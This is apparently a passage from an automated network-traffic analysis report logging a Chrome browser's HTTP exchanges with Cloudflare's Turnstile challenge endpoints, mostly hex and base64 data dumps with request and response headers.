                                                                2025-01-10 21:29:10 UTC1369INData Raw: 6b 59 36 70 70 71 79 43 6b 72 43 44 6a 70 71 63 6c 48 79 58 6a 34 37 43 6f 59 36 43 65 37 32 61 71 4a 47 61 77 63 75 4c 75 59 75 39 6f 4c 4f 4c 78 4d 7a 52 6a 71 4b 55 7a 71 72 58 73 37 71 6e 7a 74 6e 51 72 72 37 44 6f 75 53 6d 33 36 58 46 79 71 66 57 74 39 37 64 34 2b 2f 67 30 50 57 31 78 4c 47 34 75 72 57 76 36 76 62 79 76 63 45 42 2b 74 48 2b 34 66 66 39 35 4e 62 31 7a 41 54 6a 43 77 49 41 34 2b 51 50 30 42 51 53 35 52 58 61 7a 68 76 59 32 74 2f 36 46 4e 33 65 33 2b 38 51 47 43 45 54 43 41 48 6b 4a 51 50 6d 4d 41 62 76 2f 41 37 2b 4a 75 37 35 4a 52 77 33 4c 69 7a 78 49 42 45 2f 47 55 4d 76 49 66 35 49 43 43 4d 6a 4f 78 78 47 54 69 45 4c 43 30 73 4d 4b 46 51 35 56 43 51 59 50 56 6b 71 4e 54 4d 58 54 44 49 73 50 78 30 68 48 6c 64 4b 53 6b 41 6b 62 32 51
                                                                Data Ascii: kY6ppqyCkrCDjpqclHyXj47CoY6Ce72aqJGawcuLuYu9oLOLxMzRjqKUzqrXs7qnztnQrr7DouSm36XFyqfWt97d4+/g0PW1xLG4urWv6vbyvcEB+tH+4ff95Nb1zATjCwIA4+QP0BQS5RXazhvY2t/6FN3e3+8QGCETCAHkJQPmMAbv/A7+Ju75JRw3LizxIBE/GUMvIf5ICCMjOxxGTiELC0sMKFQ5VCQYPVkqNTMXTDIsPx0hHldKSkAkb2Q
                                                                2025-01-10 21:29:10 UTC1369INData Raw: 34 75 7a 71 4c 75 4c 6e 58 32 2b 6e 62 71 64 6c 70 65 44 66 38 4f 5a 79 61 57 68 79 61 74 2f 78 72 75 71 75 36 2b 4b 7a 4e 57 66 30 39 69 78 71 35 65 32 6e 5a 75 32 6e 4c 4c 43 72 4c 36 62 30 64 6e 56 75 65 65 38 36 75 66 62 74 2b 72 62 72 4d 58 65 30 62 62 79 78 2b 6d 78 32 38 33 58 79 76 48 53 32 72 33 2b 33 51 50 5a 78 50 62 4a 36 41 6f 4d 42 38 66 50 43 50 6e 6c 43 41 4d 42 45 2b 6a 69 35 67 50 30 31 78 7a 61 36 50 50 63 49 42 34 45 34 76 44 6b 34 65 4d 4d 33 51 41 4c 2b 77 51 5a 4c 7a 4c 75 2f 52 55 55 39 7a 50 72 46 69 6b 53 50 76 51 50 2b 43 38 78 50 42 4d 39 46 69 55 55 4a 55 51 4c 43 41 6b 50 53 54 73 38 48 69 34 66 56 78 41 35 4d 6c 63 38 57 6a 6b 39 4b 52 67 58 47 30 46 6a 4d 56 49 78 5a 56 46 58 4a 55 64 70 4f 56 78 45 59 47 52 42 64 57 4a 43
                                                                Data Ascii: 4uzqLuLnX2+nbqdlpeDf8OZyaWhyat/xruqu6+KzNWf09ixq5e2nZu2nLLCrL6b0dnVuee86ufbt+rbrMXe0bbyx+mx283XyvHS2r3+3QPZxPbJ6AoMB8fPCPnlCAMBE+ji5gP01xza6PPcIB4E4vDk4eMM3QAL+wQZLzLu/RUU9zPrFikSPvQP+C8xPBM9FiUUJUQLCAkPSTs8Hi4fVxA5Mlc8Wjk9KRgXG0FjMVIxZVFXJUdpOVxEYGRBdWJC
                                                                2025-01-10 21:29:10 UTC1369INData Raw: 65 33 65 58 5a 38 66 6f 2b 51 67 58 2b 6f 76 35 53 62 6c 34 76 4f 6e 73 75 63 72 37 4f 4c 73 4b 57 33 6c 4e 69 58 79 37 44 59 78 72 47 30 32 72 54 69 34 75 48 65 31 62 6a 57 71 64 58 58 79 74 79 34 70 65 71 72 79 2f 54 6b 38 38 72 71 79 4c 48 34 72 65 58 4d 32 4d 34 41 79 74 6e 68 7a 4e 7a 6e 31 4e 44 61 2b 76 7a 44 32 4f 73 4e 41 75 58 4a 36 38 30 45 35 52 6e 78 34 65 63 54 2b 4f 63 58 31 75 2f 66 32 76 4d 6b 33 77 54 67 48 50 72 34 49 79 54 70 4c 78 6b 69 47 67 54 6c 4a 67 59 66 41 69 4d 5a 45 51 73 30 48 52 55 64 4b 2f 33 2b 52 44 63 6e 4b 41 45 35 42 78 30 37 50 51 6f 6c 53 45 45 78 4d 53 74 4e 53 79 46 4f 52 68 5a 57 44 6b 63 2b 4c 54 52 52 51 56 34 57 57 44 5a 50 4d 46 74 69 59 32 56 62 50 6d 4d 36 59 47 64 7a 58 57 45 78 53 48 64 75 63 6c 46 4d 64
                                                                Data Ascii: e3eXZ8fo+QgX+ov5Sbl4vOnsucr7OLsKW3lNiXy7DYxrG02rTi4uHe1bjWqdXXyty4peqry/Tk88rqyLH4reXM2M4AytnhzNzn1NDa+vzD2OsNAuXJ680E5Rnx4ecT+OcX1u/f2vMk3wTgHPr4IyTpLxkiGgTlJgYfAiMZEQs0HRUdK/3+RDcnKAE5Bx07PQolSEExMStNSyFORhZWDkc+LTRRQV4WWDZPMFtiY2VbPmM6YGdzXWExSHduclFMd
                                                                2025-01-10 21:29:10 UTC1369INData Raw: 35 68 63 65 2f 74 35 75 59 76 4d 48 45 75 71 65 49 6a 49 54 45 79 4b 62 4e 6a 73 32 36 77 73 7a 48 72 73 36 34 30 74 79 62 33 70 37 68 34 39 4b 6b 35 63 48 5a 71 64 57 6f 78 76 47 6a 79 65 61 76 34 62 44 73 38 65 58 71 36 4c 62 54 39 73 76 32 36 64 6a 76 39 38 48 52 35 76 6e 47 34 4f 73 42 41 2b 6a 36 42 41 72 6e 79 67 6e 6d 35 50 48 53 41 74 51 52 32 4e 33 55 2f 74 34 4f 32 78 76 67 49 75 51 5a 34 69 59 6f 46 79 4c 74 4d 43 67 67 42 41 45 6c 4b 69 30 6a 45 50 44 30 37 43 30 78 44 7a 62 32 4e 69 4d 72 4e 54 41 58 4e 79 45 37 52 51 52 48 43 51 41 38 52 41 77 50 53 45 55 51 43 43 59 33 46 56 59 79 53 42 59 2f 46 55 6f 65 57 44 31 54 57 79 49 6b 52 31 73 2f 56 30 4e 6a 4b 6c 39 59 58 45 4d 73 55 6d 73 77 55 56 68 72 57 30 35 6e 64 6d 70 73 64 54 74 43 63 48
                                                                Data Ascii: 5hce/t5uYvMHEuqeIjITEyKbNjs26wszHrs640tyb3p7h49Kk5cHZqdWoxvGjyeav4bDs8eXq6LbT9sv26djv98HR5vnG4OsBA+j6BArnygnm5PHSAtQR2N3U/t4O2xvgIuQZ4iYoFyLtMCggBAElKi0jEPD07C0xDzb2NiMrNTAXNyE7RQRHCQA8RAwPSEUQCCY3FVYySBY/FUoeWD1TWyIkR1s/V0NjKl9YXEMsUmswUVhrW05ndmpsdTtCcH
                                                                2025-01-10 21:29:10 UTC1369INData Raw: 76 49 72 4a 74 37 43 4d 7a 49 6a 50 6a 39 47 2f 30 70 53 76 70 63 36 59 79 4e 50 54 6e 74 32 63 30 4a 36 6c 6e 4e 75 6b 31 62 33 66 70 64 6e 46 34 36 76 48 76 65 61 76 74 61 7a 70 73 2f 58 5a 33 4c 65 76 7a 65 2b 36 73 38 44 7a 76 72 66 6c 2b 63 50 65 41 50 7a 48 34 2b 6b 44 79 2f 33 4d 42 4e 49 53 37 51 7a 52 42 76 45 58 31 38 2f 39 45 74 77 4f 2b 52 50 67 49 68 41 4a 35 41 41 43 48 4f 6f 71 2b 53 4c 73 48 75 77 6e 38 43 45 73 4b 76 51 51 43 69 7a 33 45 2f 51 76 2b 78 67 4f 4f 50 30 79 49 6a 67 46 52 51 45 2f 42 77 41 69 53 77 31 4f 48 6a 55 52 4b 77 31 4c 46 55 59 32 54 42 67 51 47 56 4d 63 54 56 68 54 49 56 49 6c 56 79 52 6d 4e 6d 41 72 61 6b 35 73 4b 6c 35 4b 59 6a 42 79 52 6d 6b 31 55 46 5a 72 4f 47 6c 30 62 7a 31 59 59 6e 56 41 4f 46 4a 32 52 57 42
                                                                Data Ascii: vIrJt7CMzIjPj9G/0pSvpc6YyNPTnt2c0J6lnNuk1b3fpdnF46vHveavtazps/XZ3Levze+6s8Dzvrfl+cPeAPzH4+kDy/3MBNIS7QzRBvEX18/9EtwO+RPgIhAJ5AACHOoq+SLsHuwn8CEsKvQQCiz3E/Qv+xgOOP0yIjgFRQE/BwAiSw1OHjURKw1LFUY2TBgQGVMcTVhTIVIlVyRmNmArak5sKl5KYjByRmk1UFZrOGl0bz1YYnVAOFJ2RWB
                                                                2025-01-10 21:29:10 UTC1369INData Raw: 4b 69 6e 76 5a 44 50 77 35 47 34 71 4b 2f 46 6d 4e 66 4c 6d 63 44 50 32 38 36 36 32 61 47 6c 34 63 58 57 31 36 33 6a 34 4b 72 6e 33 75 57 75 31 4f 50 59 74 50 58 56 35 2b 75 36 32 65 72 72 77 66 66 30 76 38 58 45 36 50 66 31 41 2f 7a 47 37 50 76 77 2f 66 76 53 78 51 54 56 7a 68 59 61 30 39 50 71 43 68 6a 65 48 74 6f 64 34 41 55 51 31 78 37 6b 34 51 6b 6b 4a 42 6b 5a 49 75 76 74 4a 7a 51 56 49 67 77 76 4b 66 49 5a 4f 42 30 70 45 2f 77 68 4c 66 4d 36 39 66 30 6c 42 55 41 32 4e 54 34 4d 43 6b 4d 61 4d 54 73 6f 53 30 55 50 4e 55 67 35 53 45 55 59 56 45 67 75 59 46 4e 52 58 6c 74 56 48 30 55 79 53 56 51 36 62 46 39 64 61 53 31 52 58 45 4a 30 61 47 56 79 62 32 6b 7a 57 54 56 64 61 45 36 41 64 48 46 39 51 57 56 77 56 6f 68 35 65 59 61 44 66 55 64 74 54 58 46 38
                                                                Data Ascii: KinvZDPw5G4qK/FmNfLmcDP28662aGl4cXW163j4Krn3uWu1OPYtPXV5+u62errwff0v8XE6Pf1A/zG7Pvw/fvSxQTVzhYa09PqChjeHtod4AUQ1x7k4QkkJBkZIuvtJzQVIgwvKfIZOB0pE/whLfM69f0lBUA2NT4MCkMaMTsoS0UPNUg5SEUYVEguYFNRXltVH0UySVQ6bF9daS1RXEJ0aGVyb2kzWTVdaE6AdHF9QWVwVoh5eYaDfUdtTXF8


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.849749104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:10 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:10 UTC442INHTTP/1.1 400 Bad Request
                                                                Date: Fri, 10 Jan 2025 21:29:10 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 14
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                cf-chl-out: lGTPcWrGAKfwBPQvhH96tu5xDQ/4/py3h3flRIyVNKz+7ikj97itVcQnVdeI6UHZWoGiurCBDUlijFwUACfuMQ==$1oDQaD4w7qTsgRca0mQRDQ==
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2d22da14252-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:10 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                Data Ascii: {"err":100230}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.849750104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:14 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 34792
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:14 UTC16384OUTData Raw: 76 5f 38 66 66 66 63 32 61 32 65 39 34 64 30 66 36 63 3d 61 79 4f 72 4d 68 54 4e 71 76 79 6d 79 6d 53 79 54 48 54 76 67 70 4f 48 4f 6d 4b 37 41 4e 6d 66 6d 47 70 48 4e 54 6a 67 72 68 70 56 48 6d 75 6d 63 70 41 48 25 32 62 70 6d 47 48 6d 48 58 34 64 54 50 6d 32 58 54 42 6d 41 72 58 54 7a 6d 52 47 64 66 59 6d 68 79 6d 7a 67 71 70 24 64 70 6d 61 53 48 6d 24 2b 71 4f 77 70 6d 75 52 72 68 4e 34 6d 32 2b 54 32 6d 34 4f 54 63 67 63 6d 33 76 34 6d 33 4f 54 4b 6d 34 2b 54 59 78 61 54 6d 6d 56 52 6d 33 47 4f 34 70 31 75 72 33 44 64 72 6d 42 49 49 63 62 75 6b 45 38 6d 66 49 44 51 41 48 50 4e 70 6e 67 48 49 63 6b 37 75 52 49 76 6d 33 56 65 61 50 53 78 6d 77 49 4e 6d 68 56 2b 4c 4f 4f 34 39 49 47 76 54 45 59 34 48 67 6e 63 70 68 47 6e 74 67 31 51 70 55 61 45 70 2d 41
                                                                Data Ascii: v_8fffc2a2e94d0f6c=ayOrMhTNqvymymSyTHTvgpOHOmK7ANmfmGpHNTjgrhpVHmumcpAH%2bpmGHmHX4dTPm2XTBmArXTzmRGdfYmhymzgqp$dpmaSHm$+qOwpmuRrhN4m2+T2m4OTcgcm3v4m3OTKm4+TYxaTmmVRm3GO4p1ur3DdrmBIIcbukE8mfIDQAHPNpngHIck7uRIvm3VeaPSxmwINmhV+LOO49IGvTEY4HgncphGntg1QpUaEp-A
                                                                2025-01-10 21:29:14 UTC16384OUTData Raw: 61 52 6d 66 63 50 72 66 74 56 67 33 57 72 6f 6d 70 72 66 58 68 6d 48 37 33 43 6d 59 6d 4c 70 33 69 6d 70 6d 2b 44 68 53 6d 78 6d 7a 70 33 6d 6d 24 6d 52 58 41 64 6d 71 6d 4c 58 54 6d 6d 43 72 4f 79 68 4e 54 69 65 66 68 72 41 72 55 6d 6d 4f 33 6d 54 67 70 41 6d 76 72 4c 53 6d 24 6d 61 70 68 4e 6d 35 6a 58 6d 6b 38 6d 43 6d 4f 58 68 64 6d 6c 6d 4f 58 68 64 2b 48 66 54 49 6d 2d 6d 67 77 54 6d 6d 37 69 52 67 34 47 70 6d 6d 7a 4d 42 70 56 6d 59 75 24 57 54 77 72 52 67 54 72 54 6f 6d 41 72 45 2b 33 6f 6d 33 72 52 79 33 42 6d 4a 71 33 79 33 62 6d 43 74 68 6e 6d 38 72 52 67 54 67 6b 6b 6d 6e 71 68 6e 54 67 2b 4e 70 66 79 54 32 6d 46 70 56 37 68 49 72 42 70 66 79 68 52 70 42 70 56 79 68 54 6d 51 44 34 67 68 57 6d 36 70 61 2b 68 6e 37 33 72 45 67 33 42 6d 55 6d 52
                                                                Data Ascii: aRmfcPrftVg3WromprfXhmH73CmYmLp3impm+DhSmxmzp3mm$mRXAdmqmLXTmmCrOyhNTiefhrArUmmO3mTgpAmvrLSm$maphNm5jXmk8mCmOXhdmlmOXhd+HfTIm-mgwTmm7iRg4GpmmzMBpVmYu$WTwrRgTrTomArE+3om3rRy3BmJq3y3bmCthnm8rRgTgkkmnqhnTg+NpfyT2mFpV7hIrBpfyhRpBpVyhTmQD4ghWm6pa+hn73rEg3BmUmR
                                                                2025-01-10 21:29:14 UTC2024OUTData Raw: 6d 49 6d 78 32 44 48 54 38 6d 33 64 62 48 6d 75 38 69 54 66 6d 74 55 70 63 77 36 57 6d 7a 6d 2d 56 34 53 36 47 77 79 37 34 53 6d 33 49 71 4a 7a 32 6b 31 6d 74 68 6b 6a 2d 31 6d 32 31 79 2d 36 46 52 37 66 68 62 6d 35 48 69 2b 41 66 72 6d 75 5a 4e 6c 70 6d 41 54 6b 2d 31 70 74 4e 4c 77 52 5a 6f 62 36 72 69 6d 33 6d 6d 36 72 69 48 45 2d 6d 61 4b 79 49 66 64 61 74 6d 70 72 6d 67 34 6b 6d 4e 62 64 70 49 4f 45 67 72 33 67 54 50 74 36 6d 34 35 6a 39 35 58 70 68 4b 70 4b 79 64 6d 56 35 46 2d 72 31 42 5a 61 74 6b 6d 61 70 68 64 36 64 48 76 35 71 62 54 57 76 62 32 68 62 54 31 52 44 6d 54 34 77 49 72 69 70 56 53 64 49 6d 69 45 54 66 68 34 72 49 71 6c 52 2b 6e 47 65 59 7a 36 30 39 35 6e 4f 48 6a 6e 41 4f 45 2b 69 6f 62 42 6f 37 69 48 7a 54 35 2b 47 35 78 4e 6a 43 6c
                                                                Data Ascii: mImx2DHT8m3dbHmu8iTfmtUpcw6Wmzm-V4S6Gwy74Sm3IqJz2k1mthkj-1m21y-6FR7fhbm5Hi+AfrmuZNlpmATk-1ptNLwRZob6rim3mm6riHE-maKyIfdatmprmg4kmNbdpIOEgr3gTPt6m45j95XphKpKydmV5F-r1BZatkmaphd6dHv5qbTWvb2hbT1RDmT4wIripVSdImiETfh4rIqlR+nGeYz6095nOHjnAOE+iobBo7iHzT5+G5xNjCl
                                                                2025-01-10 21:29:14 UTC282INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 4624
                                                                Connection: close
                                                                cf-chl-out: H1AmeR7F1pNvgh9TFR24NGqro6pbDz2TFNpCYOfNTWVeufK+2ypM8uEgwvaUXvyC6ZEwFbjIamNawOOTrIgnYl63bQRNpUqJ05DVi6qqF3Q=$tpII6bwva/ySo5lWYjeDRw==
                                                                2025-01-10 21:29:14 UTC1255INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 59 74 43 72 71 54 30 32 50 7a 42 6b 4e 76 4b 56 50 55 62 49 56 46 48 43 56 46 57 41 51 69 4f 6e 7a 52 7a 45 6e 49 4b 4e 72 79 31 74 65 4d 36 6f 4c 66 35 7a 32 72 4f 44 6d 36 55 43 48 78 48 4b 45 53 4c 54 6f 75 48 69 37 74 73 5a 38 69 52 5a 6f 74 69 59 39 6a 46 4c 59 35 43 69 65 6c 77 2f 73 57 58 58 37 73 6f 36 47 30 49 37 62 78 68 42 55 38 32 45 50 6b 6b 2f 71 50 4e 53 42 6e 62 6e 2b 35 75 54 4f 49 57 6b 57 37 58 39 78 53 30 61 67 57 34 32 66 68 32 6e 46 58 2f 6c 33 47 47 39 54 4c 76 46 30 32 77 70 4f 65 31 62 67 61 74 71 59 67 62 33 4f 32 4a 4b 64 2b 42 78 41 6c 58 5a 72 34 33 4d 37 57 44 45 67 35 52 64 57 34 52 44 37 43 36 78 31 6b 34 50 7a 46 58 65 67 62 51 34 6e 57 2b 6f 46 50 73 4f 62 2b 74 44 31 7a 4e 33 46
                                                                Data Ascii: cf-chl-out-s: YtCrqT02PzBkNvKVPUbIVFHCVFWAQiOnzRzEnIKNry1teM6oLf5z2rODm6UCHxHKESLTouHi7tsZ8iRZotiY9jFLY5Cielw/sWXX7so6G0I7bxhBU82EPkk/qPNSBnbn+5uTOIWkW7X9xS0agW42fh2nFX/l3GG9TLvF02wpOe1bgatqYgb3O2JKd+BxAlXZr43M7WDEg5RdW4RD7C6x1k4PzFXegbQ4nW+oFPsOb+tD1zN3F
                                                                2025-01-10 21:29:14 UTC1201INData Raw: 5a 47 4b 4c 69 34 79 57 6b 48 64 55 6d 5a 42 35 58 6f 78 5a 67 32 56 75 65 32 69 45 6d 36 5a 2b 68 4b 2b 69 65 70 4b 6f 6e 6d 39 75 64 5a 4b 55 74 4b 61 56 69 4c 71 61 70 37 79 7a 76 4c 79 69 66 4c 44 41 70 6f 4b 4b 75 4a 36 47 79 71 61 39 69 70 36 6c 79 38 69 73 74 72 65 52 72 37 71 33 6d 62 48 4d 76 4a 71 5a 34 39 72 5a 34 73 62 53 6f 72 2f 55 31 61 66 6a 33 74 6e 61 75 38 66 70 77 63 2f 50 36 63 6e 55 37 73 6a 7a 39 62 6e 34 75 39 67 42 31 37 7a 62 34 76 4c 42 42 77 30 47 78 64 33 2b 2b 2f 48 72 36 77 7a 69 37 39 2f 6e 36 42 72 33 2b 65 30 66 36 77 37 79 31 43 4c 34 32 78 67 6d 4b 41 63 65 48 76 55 72 4c 66 77 63 37 43 4d 72 4c 79 38 76 4c 54 41 6e 43 54 73 63 48 68 50 35 46 42 49 43 46 52 34 2b 42 41 67 64 48 6a 30 69 4c 45 59 35 55 53 56 53 54 7a 49
                                                                Data Ascii: ZGKLi4yWkHdUmZB5XoxZg2Vue2iEm6Z+hK+iepKonm9udZKUtKaViLqap7yzvLyifLDApoKKuJ6Gyqa9ip6ly8istreRr7q3mbHMvJqZ49rZ4sbSor/U1afj3tnau8fpwc/P6cnU7sjz9bn4u9gB17zb4vLBBw0Gxd3++/Hr6wzi79/n6Br3+e0f6w7y1CL42xgmKAceHvUrLfwc7CMrLy8vLTAnCTscHhP5FBICFR4+BAgdHj0iLEY5USVSTzI
                                                                2025-01-10 21:29:14 UTC1369INData Raw: 41 72 34 39 42 37 67 2b 52 34 67 2b 65 41 67 4a 78 59 47 42 79 6b 6e 2b 53 59 72 4c 43 6a 38 36 78 55 52 38 2f 55 7a 4d 43 72 33 45 50 51 4e 4c 54 77 72 2f 45 45 2f 2f 42 45 36 4e 67 56 47 4e 79 4d 63 43 56 45 6c 49 69 49 2f 46 43 56 57 52 44 41 56 4e 6c 68 54 50 42 6c 64 57 7a 34 73 49 46 4a 59 52 56 4d 71 61 44 6c 74 49 47 49 6f 4c 6c 30 39 64 58 46 4d 5a 47 38 31 4f 6e 64 37 4e 55 31 34 54 6e 31 74 56 49 47 47 57 58 42 65 68 58 52 71 65 58 68 36 62 6d 32 53 6a 59 64 50 6c 49 4a 6d 6b 5a 6c 55 6a 31 56 62 69 59 68 76 58 5a 65 63 63 46 32 67 66 6f 68 69 6c 6f 71 6e 71 5a 65 45 5a 35 74 6b 6e 32 78 75 64 71 69 41 75 59 2b 77 6c 36 64 35 65 61 35 35 6c 6e 32 69 66 4a 57 61 6b 38 65 65 78 4c 75 33 6f 63 54 47 7a 62 7a 45 79 35 43 57 6a 61 65 54 6d 62 72 57
                                                                Data Ascii: Ar49B7g+R4g+eAgJxYGBykn+SYrLCj86xUR8/UzMCr3EPQNLTwr/EE//BE6NgVGNyMcCVElIiI/FCVWRDAVNlhTPBldWz4sIFJYRVMqaDltIGIoLl09dXFMZG81Ond7NU14Tn1tVIGGWXBehXRqeXh6bm2SjYdPlIJmkZlUj1VbiYhvXZeccF2gfohiloqnqZeEZ5tkn2xudqiAuY+wl6d5ea55ln2ifJWak8eexLu3ocTGzbzEy5CWjaeTmbrW
                                                                2025-01-10 21:29:14 UTC1369INData Raw: 50 36 39 68 38 65 4a 50 7a 35 2f 4f 4d 6c 47 68 77 75 42 51 7a 6c 4c 68 45 41 4c 4f 6f 77 46 77 59 4a 47 53 73 2b 2f 69 77 30 2b 79 45 6a 4f 45 66 36 51 30 59 4d 54 41 42 43 43 42 74 49 44 45 35 52 49 42 64 41 56 43 6b 53 4d 52 74 61 57 7a 35 55 48 6c 74 53 56 69 49 31 52 31 77 38 53 55 51 6d 50 31 64 5a 5a 45 4e 66 55 32 64 48 61 31 4a 72 52 6b 35 78 52 6d 70 66 4e 31 56 79 51 46 31 53 67 56 56 54 55 6b 42 58 5a 34 32 48 58 4a 42 38 54 49 39 73 67 6c 43 48 6a 49 56 70 63 46 57 49 62 6e 57 41 69 36 43 42 6d 61 4b 42 6d 36 4b 6a 67 6c 31 72 5a 47 70 76 65 49 57 76 62 6f 64 72 73 34 75 4e 65 62 53 74 6c 34 2b 79 75 71 32 68 6e 33 2b 30 72 61 4f 2b 76 37 53 49 75 61 62 4e 6f 34 75 50 72 34 7a 4b 7a 72 4c 4b 78 61 43 68 31 36 54 48 71 72 69 7a 79 71 43 59 6f
                                                                Data Ascii: P69h8eJPz5/OMlGhwuBQzlLhEALOowFwYJGSs+/iw0+yEjOEf6Q0YMTABCCBtIDE5RIBdAVCkSMRtaWz5UHltSViI1R1w8SUQmP1dZZENfU2dHa1JrRk5xRmpfN1VyQF1SgVVTUkBXZ42HXJB8TI9sglCHjIVpcFWIbnWAi6CBmaKBm6Kjgl1rZGpveIWvbodrs4uNebStl4+yuq2hn3+0raO+v7SIuabNo4uPr4zKzrLKxaCh16THqrizyqCYo
                                                                2025-01-10 21:29:14 UTC685INData Raw: 70 39 65 77 4d 49 53 76 34 43 67 77 52 41 69 51 44 46 52 59 70 38 68 6b 4d 4b 7a 30 31 49 44 41 58 50 42 42 47 4f 69 41 59 41 44 51 44 49 42 67 61 43 53 42 41 55 55 63 6d 44 6a 59 51 47 52 49 76 54 69 6c 61 48 6a 30 74 59 53 39 41 4d 54 38 38 51 69 68 58 56 55 6b 35 4f 30 78 4e 50 47 39 53 64 54 52 6d 4e 58 68 4d 61 6e 56 33 54 30 6f 31 66 30 35 78 56 6a 31 53 63 30 39 36 57 47 4f 4a 57 48 56 73 67 6d 68 73 53 6b 75 4c 63 5a 56 66 68 47 52 6b 57 5a 31 62 56 47 2b 4e 66 58 70 2f 6b 58 4b 41 67 33 46 34 6c 33 75 57 65 71 75 44 6f 59 4a 38 6b 49 75 43 67 4b 57 75 6c 48 43 62 6c 49 32 62 6d 73 43 41 74 49 4b 78 65 35 2b 69 79 58 2b 43 68 73 4f 58 76 61 50 41 68 34 71 4f 76 35 37 44 6a 37 57 32 6f 36 36 57 72 64 71 66 76 4c 4c 68 72 4d 47 78 6e 72 54 45 78 64
                                                                Data Ascii: p9ewMISv4CgwRAiQDFRYp8hkMKz01IDAXPBBGOiAYADQDIBgaCSBAUUcmDjYQGRIvTilaHj0tYS9AMT88QihXVUk5O0xNPG9SdTRmNXhManV3T0o1f05xVj1Sc096WGOJWHVsgmhsSkuLcZVfhGRkWZ1bVG+NfXp/kXKAg3F4l3uWequDoYJ8kIuCgKWulHCblI2bmsCAtIKxe5+iyX+ChsOXvaPAh4qOv57Dj7W2o66WrdqfvLLhrMGxnrTExd


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.849751104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:15 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:15 UTC442INHTTP/1.1 400 Bad Request
                                                                Date: Fri, 10 Jan 2025 21:29:15 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 14
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
